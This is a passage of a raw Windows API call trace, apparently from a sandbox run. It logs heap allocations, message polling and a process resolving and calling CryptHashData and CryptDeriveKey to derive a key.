lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0251.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.061] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0251.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0251.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0251.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e516d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0251.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.063] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0251.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0251.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.063] CryptHashData (hHash=0xa870d0, pbData=0x2e55068, dwDataLen=0x3, dwFlags=0x1) returned 1 [0251.063] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.063] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0251.063] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0251.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0251.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0251.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0251.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0251.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0251.064] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0251.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0251.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.065] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0251.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0251.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0251.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0251.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0251.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0251.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0251.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0251.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ac0 [0251.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ac0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0251.070] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0251.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0251.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0251.070] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa870d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0251.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0251.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0251.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0251.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.073] 